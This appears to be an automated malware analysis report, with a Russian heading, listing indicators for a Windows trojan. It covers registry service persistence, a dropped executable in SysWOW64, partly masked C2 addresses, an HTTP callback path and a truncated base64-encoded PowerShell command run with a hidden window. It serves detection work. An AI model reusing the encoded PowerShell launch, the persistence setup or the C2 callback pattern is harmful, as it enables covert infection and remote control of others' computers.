Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msrd3x40] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msrd3x40] 'ImagePath' = '"%WINDIR%\SysWOW64\msvcr90d\msrd3x40.exe"'
- 'msrd3x40' "%WINDIR%\SysWOW64\msvcr90d\msrd3x40.exe"
- 'msrd3x40' %WINDIR%\SysWOW64\msvcr90d\msrd3x40.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABDADIAaABwAGEAMAB4AD0AKAAoACcATwBoAF8AJwArACcANwAnACkAKwAoACcAMQAnACsAJwBkAHMAJwApACkAOwAkAFoAMQBhAHMAdQAyAHcAPQAkAFUAdwA0ADcAdQB0AGsAIAArACAAWwBjAGgAYQByAF0AKAAxACAAKw...
- %TEMP%\blt40eh\ybnh5yr\ji4wfs.exe
- %WINDIR%\syswow64\msvcr90d\msrd3x40.exe
- %TEMP%\blt40eh\ybnh5yr\ji4wfs.exe в %WINDIR%\syswow64\msvcr90d\msrd3x40.exe
- '73.##0.19.104':80
- '10#.#.63.137':8080
- http://10#.#.63.137:8080/L744YiWU5uVNOJj/rs7BihFpAanupIFVROb/xnQjWYCVfQG9KQNL/hl8mEjtZguYvnwr/ via 10#.#.63.137
- DNS ASK jr####vices.com.br
- '%TEMP%\blt40eh\ybnh5yr\ji4wfs.exe'
- '%WINDIR%\syswow64\msvcr90d\msrd3x40.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABDADIAaABwAGEAMAB4AD0AKAAoACcATwBoAF8AJwArACcANwAnACkAKwAoACcAMQAnACsAJwBkAHMAJwApACkAOwAkAFoAMQBhAHMAdQAyAHcAPQAkAFUAdwA0ADcAdQB0AGsAIAArACAAWwBjAGgAYQByAF0AKAAxACAAKw...' (со скрытым окном)